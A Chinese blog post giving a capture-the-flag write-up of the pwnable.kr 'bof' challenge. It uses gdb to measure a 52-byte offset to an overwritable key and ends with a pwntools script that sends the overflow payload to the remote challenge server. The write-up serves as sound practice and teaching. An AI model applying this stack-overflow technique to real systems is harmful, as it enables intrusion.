美文网首页
Pwnable.kr系列--bof(3)

Pwnable.kr系列--bof(3)

作者: Linkingg | 来源:发表于2017-05-16 01:15 被阅读0次
2017-05-16-000932_404x397_scrot.png

明显可以看出gets(overflowme)中存在栈溢出,
用gdb调试一下

gdb .bof

在main函数处设个断点

b main

run一下

Screenshot from 2017-05-16 00-44-23.png

可以看到函数func的地址为0x5655562c
反汇编一下该函数


Screenshot from 2017-05-16 00-46-25.png

在gets函数处设个断点

b* 0x5655564f

让程序跑到断点处
然后查看栈的数据

Screenshot from 2017-05-16 00-49-12.png

现在栈顶位置所存的地址指向overflowme数组的首地址
所以overflow首地址为0xffffce4c
可以清楚地看到0xdeadbeef存在栈中,并且可以算出
0xdeadbeef和overflowme首地址之间相差了52个字节,
所以填充完52个字节之后就能覆盖到0xdeadbeef了
poc如下:

#!/usr/binenv                                                              
from pwn import *

#target = process("./bof")
target = remote("pwnable.kr", "9000")

key = 0xcafebabe
padding = "A" * 52
payload = padding + p32(key)
  
target.send(payload)
target.interactive()

相关文章

  • Pwnable.kr-3.bof

    下载链接:http://pwnable.kr/bin/bofhttp://pwnable.kr/bin/bof.c...

  • Pwnable.kr系列--bof(3)

    明显可以看出gets(overflowme)中存在栈溢出,用gdb调试一下 gdb .bof 在main函数处设个...

  • pwnable.kr第三题:bof

    pwnable.kr 下载 先将bof 与 bof.c下载下来,先检查下 bof开启的保护 是真的吓到,基本能开的...

  • WpsecCTF Pwn部分

    1 简单的溢出 题目来源:http://pwnable.kr 之 bof 直接放入IDA,发现func函数存在问题...

  • pwnable.kr bof

    pwnable.kr bof 同样的,既然有源代码。我们就配合着源代码来做题,这样可能更利于搞懂高级语言被反汇编之...

  • pwnable.kr bof

    思路 -检查main函数调用了什么 -func函数实现了什么功能 -如何使key==0xcafebabe,调用sy...

  • Pwnable.kr系列

    pwnable.kr

  • 鹿晗穿搭经:瘦小男生也能hold住各种风格,轻松穿出清新自然模样

    ​鹿晗是首位入选“BOF 500”榜单成员的华语男明星,也是唯一一名登上BoF纸质刊封面的华人,被BOF评为“国际...

  • bof

    题目来自pwnable.kr 题目给了源码和可执行文件 查看源码可以知道 这是一个栈溢出 只要key=0xcafe...

  • pwnable.kr collision

    今天咱们来继续玩 pwnable.kr pwnable.kr collision 同样的,我们远程连接上服务器,然...

网友评论

      本文标题:Pwnable.kr系列--bof(3)

      本文链接:https://www.haomeiwen.com/subject/okmkxxtx.html